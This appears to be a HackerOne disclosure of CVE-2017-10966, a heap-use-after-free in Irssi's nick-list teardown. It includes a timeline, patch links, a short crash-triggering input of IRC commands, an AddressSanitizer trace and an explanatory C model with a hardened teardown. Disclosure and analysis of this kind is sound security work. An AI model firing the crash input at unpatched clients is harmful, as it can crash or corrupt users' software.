HackerOne report H1:247028 (Geeknik), Jul 07, 2017 - 6:45 p.m.

Internet Bug Bounty: CVE-2017-10966: Heap-use-after-free in Irssi <1.0.4

2017-07-07 18:45:38
geeknik
hackerone.com

EPSS: 0.003 (Low), percentile 70.6%

35 days after reading https://irssi.org/2017/05/12/fuzzing-irssi/, I was able to trigger a heap-use-after-free in irssi 1.0.2.

Timeline:
Report to vendor: 16 June 2017
Acknowledged by vendor: 16 June 2017
Fixed by vendor: 7 July 2017

Advisory:
http://seclists.org/oss-sec/2017/q3/80

Patch:
https://github.com/irssi/irssi/commit/5e26325317c72a04c1610ad952974e206

./irssi < test001
CAP LS
NICK root
USER root root /dev/stdin :root
MODE  +i
WHOIS root
WHO +00000000000000000000o00

==30112==ERROR: AddressSanitizer: heap-use-after-free on address 0x607000008100 at pc 0x0000006d3a48 bp 0x7ffdd447b320 sp 0x7ffdd447b318
READ of size 8 at 0x607000008100 thread T0
    #0 0x6d3a47 in nicklist_remove_hash /root/irssi-1.0.2/src/core/nicklist.c:455:30
    #1 0x7f97420273bf in g_hash_table_foreach (/lib/x86_64-linux-gnu/libglib-2.0.so.0+0x393bf)
    #2 0x6d3786 in sig_channel_destroyed /root/irssi-1.0.2/src/core/nicklist.c:465:2
    #3 0x6f499b in signal_emit_real /root/irssi-1.0.2/src/core/signals.c:242:3
    #4 0x6f4207 in signal_emit /root/irssi-1.0.2/src/core/signals.c:286:3
    #5 0x699ec1 in channel_destroy /root/irssi-1.0.2/src/core/channels.c:83:2
    #6 0x672ce0 in event_join /root/irssi-1.0.2/src/irc/core/channel-events.c:258:3
    #7 0x6f499b in signal_emit_real /root/irssi-1.0.2/src/core/signals.c:242:3
    #8 0x6f4207 in signal_emit /root/irssi-1.0.2/src/core/signals.c:286:3
    #9 0x62cd3d in irc_server_event /root/irssi-1.0.2/src/irc/core/irc.c:308:7
    #10 0x6f499b in signal_emit_real /root/irssi-1.0.2/src/core/signals.c:242:3
    #11 0x6f59b6 in signal_emit_id /root/irssi-1.0.2/src/core/signals.c:304:3
    #12 0x62d33a in irc_parse_incoming_line /root/irssi-1.0.2/src/irc/core/irc.c:362:3
    #13 0x6f499b in signal_emit_real /root/irssi-1.0.2/src/core/signals.c:242:3
    #14 0x6f59b6 in signal_emit_id /root/irssi-1.0.2/src/core/signals.c:304:3
    #15 0x62d6ba in irc_parse_incoming /root/irssi-1.0.2/src/irc/core/irc.c:383:3
    #16 0x6bb9b2 in irssi_io_invoke /root/irssi-1.0.2/src/core/misc.c:55:3
    #17 0x7f9742038229 in g_main_context_dispatch (/lib/x86_64-linux-gnu/libglib-2.0.so.0+0x4a229)
    #18 0x7f97420385df  (/lib/x86_64-linux-gnu/libglib-2.0.so.0+0x4a5df)
    #19 0x7f974203868b in g_main_context_iteration (/lib/x86_64-linux-gnu/libglib-2.0.so.0+0x4a68b)
    #20 0x57e4a7 in main /root/irssi-1.0.2/src/fe-text/irssi.c:326:3
    #21 0x7f97408273f0 in __libc_start_main /build/glibc-cxyGtm/glibc-2.24/csu/../csu/libc-start.c:291
    #22 0x42e979 in _start (/root/irssi-1.0.2/src/fe-text/irssi+0x42e979)

0x607000008100 is located 64 bytes inside of 72-byte region [0x6070000080c0,0x607000008108)
freed by thread T0 here:
    #0 0x4e4170 in __interceptor_cfree.localalias.1 (/root/irssi-1.0.2/src/fe-text/irssi+0x4e4170)
    #1 0x6d39eb in nicklist_destroy /root/irssi-1.0.2/src/core/nicklist.c:112:2
    #2 0x6d39eb in nicklist_remove_hash /root/irssi-1.0.2/src/core/nicklist.c:456

previously allocated by thread T0 here:
    #0 0x4e4520 in calloc (/root/irssi-1.0.2/src/fe-text/irssi+0x4e4520)
    #1 0x7f974203d9e0 in g_malloc0 (/lib/x86_64-linux-gnu/libglib-2.0.so.0+0x4f9e0)

SUMMARY: AddressSanitizer: heap-use-after-free /root/irssi-1.0.2/src/core/nicklist.c:455:30 in nicklist_remove_hash
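The trace above shows the teardown loop in nicklist_remove_hash reading nick->next (nicklist.c:455) from a record that the same loop's nicklist_destroy call (nicklist.c:456) had already freed, so the chain walk reached one record twice; how the record came to be linked twice is not something the trace alone tells you. The following is an added C example, not irssi's code: a toy model of that "cache next, free current" teardown over chains of nick records, with a constructed input in which two hash keys share a tail record, an integrity check that reports such aliasing, and an unlink-then-free teardown that releases every distinct record exactly once. The record layout, function names and sample data are assumptions made for the example.

```c
#define _POSIX_C_SOURCE 200809L
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define MAX_NODES 1024

/* Toy model (assumption, not irssi's struct) of nick records chained under a hash key. */
typedef struct nick_rec {
    char *nick;
    struct nick_rec *next;
} NICK_REC;

static NICK_REC *nick_new(const char *name, NICK_REC *next)
{
    NICK_REC *n = calloc(1, sizeof *n);
    if (n == NULL) abort();
    n->nick = strdup(name);
    n->next = next;
    return n;
}

static void nick_free(NICK_REC *n)
{
    free(n->nick);
    free(n);
}

/* The common "cache next, free current" teardown, run once per hash key.
 * It is only safe if every node is reachable exactly once across the table:
 * a node linked from two keys is freed under the first key and then read
 * again (next = head->next) under the second. Shown for comparison only;
 * nothing below calls it. */
void destroy_chain_unsafe(NICK_REC *head)
{
    while (head != NULL) {
        NICK_REC *next = head->next;   /* reads freed memory if head was already released */
        nick_free(head);
        head = next;
    }
}

/* Walk every chain and record each distinct node once. Sets *aliased when a
 * node is reached a second time (shared tail or cycle). Returns the count. */
static size_t collect_unique(NICK_REC **heads, size_t nheads,
                             NICK_REC **out, size_t cap, int *aliased)
{
    size_t n = 0;
    *aliased = 0;
    for (size_t h = 0; h < nheads; h++) {
        for (NICK_REC *p = heads[h]; p != NULL; p = p->next) {
            int seen = 0;
            for (size_t i = 0; i < n && !seen; i++)
                seen = (out[i] == p);
            if (seen) {            /* already recorded, and so are its successors */
                *aliased = 1;
                break;
            }
            if (n == cap) {        /* runaway chain: treat as corrupt, stop walking */
                *aliased = 1;
                return n;
            }
            out[n++] = p;
        }
    }
    return n;
}

/* Integrity check a teardown or a fuzz harness can assert on. */
static int table_is_aliased(NICK_REC **heads, size_t nheads)
{
    NICK_REC *tmp[MAX_NODES];
    int aliased;
    collect_unique(heads, nheads, tmp, MAX_NODES, &aliased);
    return aliased;
}

/* Hardened teardown: collect distinct nodes, unlink them all, then free each
 * exactly once, so no dangling next pointer is ever followed. Returns the
 * number of records released. */
static size_t destroy_table_safe(NICK_REC **heads, size_t nheads)
{
    NICK_REC *uniq[MAX_NODES];
    int aliased;
    size_t n = collect_unique(heads, nheads, uniq, MAX_NODES, &aliased);
    for (size_t i = 0; i < n; i++)
        uniq[i]->next = NULL;
    for (size_t h = 0; h < nheads; h++)
        heads[h] = NULL;
    for (size_t i = 0; i < n; i++)
        nick_free(uniq[i]);
    return n;
}

/* Constructed input: two keys whose chains share the tail record "guest",
 * the shape under which the unsafe teardown frees it under key 0 and reads
 * it again under key 1. Three distinct records exist, not four. */
static size_t demo_shared_tail(void)
{
    NICK_REC *shared = nick_new("guest", NULL);
    NICK_REC *heads[2] = { nick_new("root", shared), nick_new("Root", shared) };
    if (!table_is_aliased(heads, 2)) abort();
    return destroy_table_safe(heads, 2);
}

/* Constructed input: one clean chain of two records. */
static size_t demo_clean(void)
{
    NICK_REC *heads[1] = { nick_new("root", nick_new("guest", NULL)) };
    if (table_is_aliased(heads, 1)) abort();
    return destroy_table_safe(heads, 1);
}

int main(void)
{
    printf("shared tail: released %zu records\n", demo_shared_tail());
    printf("clean chain: released %zu records\n", demo_clean());
    return 0;
}
```

Built with -fsanitize=address, demo_shared_tail() runs clean because the distinct records are unlinked before any free; replacing destroy_table_safe with a per-key destroy_chain_unsafe on the same input is the shape of access the report's trace describes, which is what an ASan-instrumented fuzz build is there to catch.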